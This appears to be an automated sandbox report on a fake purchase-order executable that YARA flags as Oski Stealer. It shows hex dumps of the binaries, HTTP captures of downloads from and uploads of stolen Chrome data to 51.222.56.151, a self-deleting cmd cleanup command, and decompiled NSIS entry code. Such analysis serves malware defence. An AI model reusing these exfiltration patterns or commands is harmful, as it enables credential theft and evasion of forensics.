00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 8b 4d 08 33 c0 39 41 10 0f 94 c0 5d c3 55 8b ec 8b 45 10 83 e8 00 74 46 83 e8 01 74 29 83 e8 01 74 12 83 e8 01 8b 45 08 74 05 ff
                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#4gZgZgZnsZ[eZBcZYjZ_mZ^lZE[oZ[dZg[Z^mZZfZfZXfZRichgZPELb["!w@@=Tp}pT@.text `.rdataRT@@.datatG`"B@.rsrcpd@@.reloc}~h@BUM39A]UEtFt)tEt
                                                                                                                            Jun 11, 2021 06:32:04.350179911 CEST4345OUTPOST /tsc//7.jpg HTTP/1.1
                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                            Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                                                            Content-Length: 25
                                                                                                                            Host: 51.222.56.151
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                                                                            Data Ascii: --1BEF0A57BE110FD467A--
                                                                                                                            Jun 11, 2021 06:32:04.482928991 CEST4346INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Fri, 11 Jun 2021 04:32:04 GMT
                                                                                                                            Content-Type: image/jpeg
                                                                                                                            Content-Length: 83784
                                                                                                                            Connection: keep-alive
                                                                                                                            Keep-Alive: timeout=60
                                                                                                                            Last-Modified: Thu, 06 Jun 2019 04:02:02 GMT
                                                                                                                            ETag: "14748-58a9fc6b90280"
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 26 00 00 00 d0 26 00 00 01 f0 26 00 00 00 90 27 00 00 00 40 28 00 00 00 d0 2a 00 00 00 00 2b 00 00 00 50 2b 00 00 00 90 2b 00 00 00 a0 2b 00 00
                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NEEE"GL^NElUVA_D2DDRichEPEL8'Y"! @@A H?08@.text `.dataD@.idata@@.rsrc @@.reloc0@Bp&&&'@(*+P+++
                                                                                                                            Jun 11, 2021 06:32:05.692183018 CEST4446OUTPOST /tsc//main.php HTTP/1.1
                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                            Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                                                            Content-Length: 25
                                                                                                                            Host: 51.222.56.151
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                                                                            Data Ascii: --1BEF0A57BE110FD467A--
                                                                                                                            Jun 11, 2021 06:32:05.825634956 CEST4447INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Fri, 11 Jun 2021 04:32:05 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Content-Length: 0
                                                                                                                            Connection: keep-alive
                                                                                                                            Keep-Alive: timeout=60
                                                                                                                            X-Powered-By: PHP/8.0.7
                                                                                                                            Jun 11, 2021 06:32:06.144994020 CEST4453OUTPOST /tsc/ HTTP/1.1
                                                                                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                            Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                                                            Content-Length: 88084
                                                                                                                            Host: 51.222.56.151
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Jun 11, 2021 06:32:06.145143986 CEST4469OUTData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5f 33 30 30
                                                                                                                            Data Ascii: --1BEF0A57BE110FD467AContent-Disposition: form-data; name="file"; filename="_3003373773.zip"Content-Type: zipPKlR"autofill/Google Chrome_Default.txtUTe`e`e`PKlRcc/Google Chr
                                                                                                                            Jun 11, 2021 06:32:06.278548002 CEST4475OUTData Raw: 51 6f 7a 5f bc 8b b6 87 cc ab 32 bd 2a 7b 52 d0 13 a7 8f 8a ea 21 80 47 e7 2d d4 47 3b 4f 28 ce f8 1f ea 8c bc 74 c9 57 b7 f2 77 23 38 e7 2d 63 fb da 87 4f f7 55 a7 d7 f8 d4 3a 7e 6d 10 2f 6d 79 5e ca dc 5f 5d ad b6 29 d1 f8 57 4d 7d a6 f1 ff c3
                                                                                                                            Data Ascii: Qoz_2*{R!G-G;O(tWw#8-cOU:~m/my^_])WM}30yzN`KF.wQ[>]o/T?KB(cy#<qax{V7AR8dn!uvNvEEC,97]JLC5pP<Y
                                                                                                                            Jun 11, 2021 06:32:06.278633118 CEST4486OUTData Raw: 44 a4 44 00 1e 1f ae 06 a0 d8 0a 12 63 cf a4 06 bf 3b a5 5a 93 cb a7 62 90 17 5f 6a 79 a3 6a 98 d7 b2 6a b8 9a 9f 2e 05 c0 61 ec 2e 2f 23 44 98 0d f8 0f 0e 41 eb 55 21 ac ad e1 ba e1 68 b6 dc 0e 53 6c 1a cb e2 07 b8 7e 7b 07 a7 64 6c 34 09 14 82
                                                                                                                            Data Ascii: DDc;Zb_jyjj.a./#DAU!hSl~{dl4k&D)G\CE-c8Mw-%ZCnIXO Yb_-{cdP7I[9TY;Thb"ZwCh9e+8S~dLIUe4(YH*1)O
                                                                                                                            Jun 11, 2021 06:32:06.278675079 CEST4494OUTData Raw: d7 95 35 c1 f4 b1 a3 fd 7d 77 7e 0f 0a ec 34 e3 48 67 a4 9f 8e 25 16 7c bf 73 a1 aa 95 29 fd 61 2a 6f ee 52 a9 64 3c 8c bf a5 2a a7 ba 32 f5 49 8e 7e 6a a7 47 4c d0 de 0f 62 de 73 9c f3 db 6f af 40 2f 47 9c 44 de c1 16 be fb 1b 0c a8 8e 09 e4 34
                                                                                                                            Data Ascii: 5}w~4Hg%|s)a*oRd<*2I~jGLbso@/GD4>qZ?Vf_*<I)<EKvsj/5ESw~kqp#bln%s9f*-i3YKH:9s';2a!a
                                                                                                                            Jun 11, 2021 06:32:06.279045105 CEST4504OUTData Raw: b7 bf 17 59 79 e7 50 50 2b dd b8 61 fd 08 c6 fd 34 e4 cb 80 c5 34 75 75 7f 5c f7 c7 bc 47 77 6c ee f8 93 49 f2 51 86 6f e9 f0 e7 19 21 12 67 86 1b 7f 2a aa a4 99 ce 9c d4 84 a1 6c 78 16 8c 5d 1e 6e 07 d8 50 66 f0 ce 79 3d fe 51 ef 3c 7a 97 1f 34
                                                                                                                            Data Ascii: YyPP+a44uu\GwlIQo!g*lx]nPfy=Q<z4?d x-MIZA?RLEd<"U4~Z8'O`KIl=kqty*t`*:%J|eI>,lIowpx
                                                                                                                            Jun 11, 2021 06:32:06.413166046 CEST4535OUTData Raw: 37 55 e2 ae 48 f5 05 08 79 e9 f9 71 fd fc 9f fd 85 9b 1d 38 8f 12 f1 dc 02 69 f3 96 c2 f1 a9 16 9a c1 31 da 00 1e 4b de 01 b7 9d f9 a9 06 fa 8d 4f 2c 62 87 b5 e8 f7 aa 66 3e 02 dd b5 c5 e9 e0 d0 92 21 d2 07 36 89 1c 8c 5c e9 ce f7 3c e6 47 b2 57
                                                                                                                            Data Ascii: 7UHyq8i1KO,bf>!6\<GWFMVg9{|%.IVt-F[m*/$+H%g[r DHnh>U4r/+UM.DQ=+iE5Vi:&A{@E4Zr{
                                                                                                                            Jun 11, 2021 06:32:06.413758993 CEST4546OUTData Raw: 60 60 b4 3b 7e 05 89 e2 2f d3 7c c2 ce 6a 67 57 b8 5d f1 d3 a2 9d 04 79 f0 b5 a3 63 92 a7 4c 67 64 cf da 29 34 c0 33 73 b5 e1 0a 52 fe 76 dc c4 b4 01 56 77 bd 29 4c cb 4a 61 b7 e7 56 28 e3 31 99 a5 7d ab 76 59 71 7d b6 88 57 b4 c1 8a 4e 12 1e 93
                                                                                                                            Data Ascii: ``;~/|jgW]ycLgd)43sRvVw)LJaV(1}vYq}WNJH0=cYRjxNZ?cz3~O4R,`#g;&-F]U9@ktmX'1Mu~>`,Qhl?z<'
                                                                                                                            Jun 11, 2021 06:32:06.682223082 CEST4549INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Fri, 11 Jun 2021 04:32:06 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Content-Length: 0
                                                                                                                            Connection: keep-alive
                                                                                                                            Keep-Alive: timeout=60
                                                                                                                            X-Powered-By: PHP/8.0.7


                                                                                                                            Code Manipulations

                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            Analysis Process: New Order PO2193570O1.pdf.exe PID: 1004 Parent PID: 5732

                                                                                                                            General

                                                                                                                            Start time:06:31:55
                                                                                                                            Start date:11/06/2021
                                                                                                                            Path:C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:'C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe'
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:430503 bytes
                                                                                                                            MD5 hash:328733D92332E282737F4D92CA3B4A27
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Oski, Description: Yara detected Oski Stealer, Source: 00000000.00000002.204106887.0000000009830000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                            Reputation:low

                                                                                                                            Chronological Activities

                                                                                                                            Analysis Process: New Order PO2193570O1.pdf.exe PID: 1124 Parent PID: 1004

                                                                                                                            General

                                                                                                                            Start time:06:31:56
                                                                                                                            Start date:11/06/2021
                                                                                                                            Path:C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:'C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe'
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:430503 bytes
                                                                                                                            MD5 hash:328733D92332E282737F4D92CA3B4A27
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Oski, Description: Yara detected Oski Stealer, Source: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Oski, Description: Yara detected Oski Stealer, Source: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                            Reputation:low

                                                                                                                            Chronological Activities

                                                                                                                            Analysis Process: cmd.exe PID: 5360 Parent PID: 1124

                                                                                                                            General

                                                                                                                            Start time:06:32:06
                                                                                                                            Start date:11/06/2021
                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:'C:\Windows\System32\cmd.exe' /c taskkill /pid 1124 & erase C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe & RD /S /Q C:\\ProgramData\\300337377349991\\* & exit
                                                                                                                            Imagebase:0x7ff6c7410000
                                                                                                                            File size:232960 bytes
                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high

                                                                                                                            Chronological Activities

                                                                                                                            Analysis Process: conhost.exe PID: 2148 Parent PID: 5360

                                                                                                                            General

                                                                                                                            Start time:06:32:07
                                                                                                                            Start date:11/06/2021
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                            File size:625664 bytes
                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high

                                                                                                                            Chronological Activities

                                                                                                                            Analysis Process: taskkill.exe PID: 5916 Parent PID: 5360

                                                                                                                            General

                                                                                                                            Start time:06:32:07
                                                                                                                            Start date:11/06/2021
                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:taskkill /pid 1124
                                                                                                                            Imagebase:0x310000
                                                                                                                            File size:74752 bytes
                                                                                                                            MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high

                                                                                                                            Chronological Activities

                                                                                                                            Disassembly

                                                                                                                            Code Analysis

                                                                                                                            Reset < >

                                                                                                                              Analysis Process: New Order PO2193570O1.pdf.exe PID: 1004 Parent PID: 5732 New Order PO2193570O1.pdf.exeCOMMON

                                                                                                                              Executed Functions

                                                                                                                              Function 0040323C, Relevance: 72.0, APIs: 23, Strings: 18, Instructions: 270filestringcomCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 83%
                                                                                                                              			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				intOrPtr _t71;
				intOrPtr _t77;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				intOrPtr _t113;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405E88(8);
				SHGetFileInfoA(0x41f458, 0,  &_v360, 0x160, 0); // executed
				E00405B66("hyperventilate Setup", "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\hardz\\Desktop\\New Order PO2193570O1.pdf.exe\" ";
				E00405B66(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\hardz\\Desktop\\New Order PO2193570O1.pdf.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E00405684(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E00405684(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								_t45 = _t44 + 2;
								__eflags = _t44 + 2;
								E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", _t45);
								L20:
								_t105 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E00403208(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C72(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035BD();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34; // 0x0
											if(__eflags != 0) {
												_t106 = E00405E88(3);
												_t100 = E00405E88(4);
												_t55 = E00405E88(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c; // 0xffffffff
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405427(_v408, 0x200010);
										ExitProcess(2);
									}
									_t113 =  *0x423ebc; // 0x0
									if(_t113 == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004036AF();
										goto L32;
									}
									_t103 = E00405684(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										_t101 = "C:\\Users\\hardz\\Desktop";
										if(lstrcmpiA(_t105, "C:\\Users\\hardz\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", _t101);
										}
										E00405B66(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											_t71 =  *0x423eb0; // 0x55edd0
											E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)(_t71 + 0x120)));
											DeleteFileA(0x41f058);
											if(_v416 != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\New Order PO2193570O1.pdf.exe", 0x41f058, 1) != 0) {
												_push(0);
												_push(0x41f058);
												E004058B4();
												_t77 =  *0x423eb0; // 0x55edd0
												E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)(_t77 + 0x124)));
												_t79 = E004053C6(0x41f058);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004058B4();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E0040573A(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E00403208(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}









































                                                                                                                              0x00403248
                                                                                                                              0x0040324c
                                                                                                                              0x00403254
                                                                                                                              0x00403256
                                                                                                                              0x0040325b
                                                                                                                              0x00403266
                                                                                                                              0x0040326d
                                                                                                                              0x00403275
                                                                                                                              0x0040327f
                                                                                                                              0x00403295
                                                                                                                              0x004032a5
                                                                                                                              0x004032aa
                                                                                                                              0x004032b0
                                                                                                                              0x004032b7
                                                                                                                              0x004032ca
                                                                                                                              0x004032cf
                                                                                                                              0x004032d1
                                                                                                                              0x004032d3
                                                                                                                              0x004032d8
                                                                                                                              0x004032d8
                                                                                                                              0x004032e8
                                                                                                                              0x004032ee
                                                                                                                              0x00403357
                                                                                                                              0x00403357
                                                                                                                              0x00403359
                                                                                                                              0x0040335b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004032f4
                                                                                                                              0x004032f7
                                                                                                                              0x004032ff
                                                                                                                              0x004032ff
                                                                                                                              0x00403302
                                                                                                                              0x00403307
                                                                                                                              0x00403309
                                                                                                                              0x00403309
                                                                                                                              0x0040330a
                                                                                                                              0x0040330a
                                                                                                                              0x0040330f
                                                                                                                              0x00403312
                                                                                                                              0x00403347
                                                                                                                              0x0040334c
                                                                                                                              0x00403351
                                                                                                                              0x00403354
                                                                                                                              0x00403356
                                                                                                                              0x00403356
                                                                                                                              0x00403356
                                                                                                                              0x00000000
                                                                                                                              0x00403314
                                                                                                                              0x00403314
                                                                                                                              0x00403315
                                                                                                                              0x00403318
                                                                                                                              0x00403320
                                                                                                                              0x00403323
                                                                                                                              0x00403325
                                                                                                                              0x00403325
                                                                                                                              0x00403325
                                                                                                                              0x00403323
                                                                                                                              0x00403328
                                                                                                                              0x0040332e
                                                                                                                              0x00403336
                                                                                                                              0x00403339
                                                                                                                              0x0040333b
                                                                                                                              0x0040333b
                                                                                                                              0x0040333b
                                                                                                                              0x00403339
                                                                                                                              0x0040333e
                                                                                                                              0x00403345
                                                                                                                              0x0040335f
                                                                                                                              0x00403362
                                                                                                                              0x00403362
                                                                                                                              0x0040336b
                                                                                                                              0x00403370
                                                                                                                              0x00403370
                                                                                                                              0x0040337b
                                                                                                                              0x00403381
                                                                                                                              0x00403386
                                                                                                                              0x00403388
                                                                                                                              0x004033aa
                                                                                                                              0x004033af
                                                                                                                              0x004033b6
                                                                                                                              0x004033bd
                                                                                                                              0x004033c1
                                                                                                                              0x00403428
                                                                                                                              0x00403428
                                                                                                                              0x0040342d
                                                                                                                              0x00403437
                                                                                                                              0x00403522
                                                                                                                              0x00403528
                                                                                                                              0x00403533
                                                                                                                              0x0040353c
                                                                                                                              0x0040353e
                                                                                                                              0x00403543
